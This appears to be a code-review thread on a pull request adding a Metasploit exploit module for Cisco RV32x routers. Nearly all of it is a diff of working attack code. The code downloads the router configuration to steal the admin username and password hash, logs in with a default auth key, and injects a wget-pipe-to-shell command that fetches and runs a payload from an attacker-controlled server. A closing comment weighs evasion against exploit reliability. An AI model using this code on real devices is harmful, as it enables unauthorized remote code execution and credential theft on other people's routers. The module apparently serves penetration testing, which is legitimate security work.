modules/exploits/linux/http/cisco_rv32x_rce.rb

```diff
@@ -0,0 +1,164 @@
+      ],
+      'Platform'       => 'linux',
+      'Targets'        =>
+        [
+         [ 'LINUX MIPS64',
+          {
+           'Platform' => 'linux',
+           'Arch'     => ARCH_MIPS64
+          }
+         ]
+        ],
+      'Payload'        =>
+        {
+         'BadChars' => ""
+        },
+      'CmdStagerFlavor' => [ 'bourne' ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 9 2018",
+      'DefaultTarget'  => 0))
+
+    register_options([
+      Opt::RPORT(8007), # port of Cisco webinterface
+      OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),
+      OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15])
+    ])
+  end
+
+  def execute_command(cmd, opts = {})
+    # use generated payload, we don't have to do anything here
+  end
+
+  def autofilter
+    true
+  end
+
+  def on_request_uri(cli, req)
+    print_status("#{peer} - Payload request received: #{req.uri}")
+    @cmdstager = generate_cmdstager().join(';')
+    send_response(cli, "#{@cmdstager}")
+  end
+
+  def primer
+    payload_url = get_uri
+    print_status("Downloading configuration from #{peer}")
+    res = send_request_cgi({'uri'=>normalize_uri("cgi-bin","config.exp")})
+    if res and res.code == 200
+      print_status("Successfully downloaded config")
+      username = res.body.match(/^USERNAME=([a-zA-Z]+)/)[1]
+      pass = res.body.match(/^PASSWD=(\h+)/)[1]
+      print_status("Got MD5-Hash: #{pass}")
+      print_status("Loging in as user #{username} using password hash.")
+      print_status("Using default auth_key 1964300002")
+      res2 = send_request_cgi({
+        'uri' => normalize_uri("cgi-bin","userLogin.cgi"),
+        'method' => 'POST',
+        'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=1964300002&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password="
+      })
+      if res2 and res2.code == 200
+        cookies = res2.get_cookies()
+        print_status("Successfully logged in as user #{username}.")
+        print_status("Got cookies: #{cookies}")
+        print_status("Sending payload. Staging via #{payload_url}.")
+        command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'")
+        if(command_string.length <= 50)
+          print_status("Staging command length looks good. Sending exploit!")
+        else
+          print_status("Warning: Staging command length probably too long. Trying anyway...")
+        end
+        res3 = send_request_cgi({
+          'uri' => normalize_uri("certificate_handle2.htm"),
+          'method' => 'POST',
+          'cookie' => cookies,
+              'vars_get' => {
+                 'type' => '4',
+              },
+              'vars_post' => {
+             'page' => 'self_generator.htm',
```

Comment:
Can any of this data be randomized?

Reply:
I had a look at this and I guess many parameter values can be randomized. However, I don't see any advantage in doing so. It is very unlikely that any evasion will be put in place in front of a router web interface. And the downside to randomizing is that I don't really know what values are accepted in each field by the server. Having the exploit randomly no work is IMO worse than putting in some evasion that is most likely not necessary in the first place.